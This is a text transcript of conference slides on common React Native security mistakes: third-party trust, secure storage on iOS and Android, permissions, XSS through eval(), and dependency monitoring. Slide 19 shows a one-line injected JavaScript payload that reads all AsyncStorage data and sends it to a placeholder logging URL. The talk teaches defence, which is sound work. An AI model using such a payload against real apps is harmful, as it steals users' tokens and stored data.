Slide 1

Slide 1 text

React Native Security Addressing Typical Mistakes JULIA POTAPENKO

Slide 2

Slide 2 text

About me Security Software Engineer at Cossack Labs We help companies to protect their sensitive and valuable data. @julepka

Slide 3

Slide 3 text

We will talk about Architecture Platforms usage Dependencies

Slide 4

Slide 4 text

“Choosing React Native and its components means that you understand and accept potential security consequences.”

Slide 5

Slide 5 text

Architecture basics React Native is a cross-platform solution from Facebook that allows writing native apps using React (JavaScript or TypeScript).

Slide 6

Slide 6 text

Trusting third parties Apple and Google are must haves. Add Facebook to the list.

Slide 7

Slide 7 text

Trusting third parties Apple and Google are must haves. Add Facebook to the list.

Slide 8

Slide 8 text

Trusting third parties Apple and Google are must haves. Add Facebook to the list. CVE-2020-1911 CVE-2020-1912 CVE-2020-1913

Slide 9

Slide 9 text

“Working with React Native developers deal with security for all three platforms: iOS, Android and React Native.”

Slide 10

Slide 10 text

OWASP Mobile Top 10 #1 Improper platform usage

Slide 11

Slide 11 text

React Native is a leaky abstraction @vixentael

Slide 12

Slide 12 text

Secure Store Example iOS Android Keychain SharedPreferences + KeyStore Data stored encrypted Yes Yes

Slide 13

Slide 13 text

Secure Store Example iOS Android Keychain SharedPreferences + KeyStore Data stored encrypted Yes Yes Data persists across app reinstalls Yes No Hardware-backed encryption Yes Depends on device vendor Data decrypted only before usage Decrypted when device unlocked Yes

Slide 14

Slide 14 text

Managing Android Permissions Android: You can add permissions in multiple files

Slide 15

Slide 15 text

Managing Android Permissions Android: You can add permissions in multiple files + React Navite: It is common practice to use third-party solutions

Slide 16

Slide 16 text

Managing Android Permissions Android: You can add permissions in multiple files + React Navite: It is common practice to use third-party solutions =

Slide 17

Slide 17 text

Managing Android Permissions Android: You can add permissions in multiple files + React Native: It is common practice to use third-party solutions = I don’t need this permission The app crashes if I delete it

Slide 18

Slide 18 text

Is XSS possible? XSS possibility is decreases by design.

Slide 19

Slide 19 text

Is XSS possible? XSS possibility is decreases by design. XSS is still possible. eval() _reactNative.AsyncStorage.getAllKeys(function(err,result) {_reactNative.AsyncStorage.multiGet(result,function(err,result) {fetch(‘http://example.com/logger.php?token='+JSON.stringify(result));});}); Steal all the data from local storage (AsyncStorage) by exploiting eval-based injection and accessing React Native APIs

Slide 20

Slide 20 text

Apart from Source Code Annual BIS Reports US encryption export regulations Apple privacy rules User acknowledgement about private data usage

Slide 21

Slide 21 text

“50 shades of dependencies”

Slide 22

Slide 22 text

A typical day for React Native app developer

Slide 23

Slide 23 text

A typical day for React Native app developer (It is joke )

Slide 24

Slide 24 text

Monitoring dependencies

Slide 25

Slide 25 text

Monitoring dependencies So many dependencies Additional CI work Integrating dependency checkers

Slide 26

Slide 26 text

Monitoring dependencies So many dependencies Additional CI work One update triggers another update Integrating dependency checkers Updates may be incompatible What if there is no fix for vulnerability?

Slide 27

Slide 27 text

✅ Learn more about the issue, its scope ✅ Document it, make the team aware ✅ Monitor it and book the time for the update What if there is no fix?

Slide 28

Slide 28 text

✅ Learn more about the issue, its scope ✅ Document it, make the team aware ✅ Monitor it and book the time for the update What if there is no fix? React Native requires team to plan time more carefully

Slide 29

Slide 29 text

React Native requires team to plan time more carefully ➡ iOS or Android update ➡ React Native update ➡ Forked version update ➡ Dependencies update ➡ Mobile app source code update

Slide 30

Slide 30 text

Final Thoughts “Learn once, write anywhere.” “Learn once, ask mobile security people for help.”

Slide 31

Slide 31 text

Where to go next My React Native Security Article https://www.cossacklabs.com/blog/react-native-app-security.html React Native Security Guide https://reactnative.dev/docs/security

Slide 32

Slide 32 text

Thank You! @julepka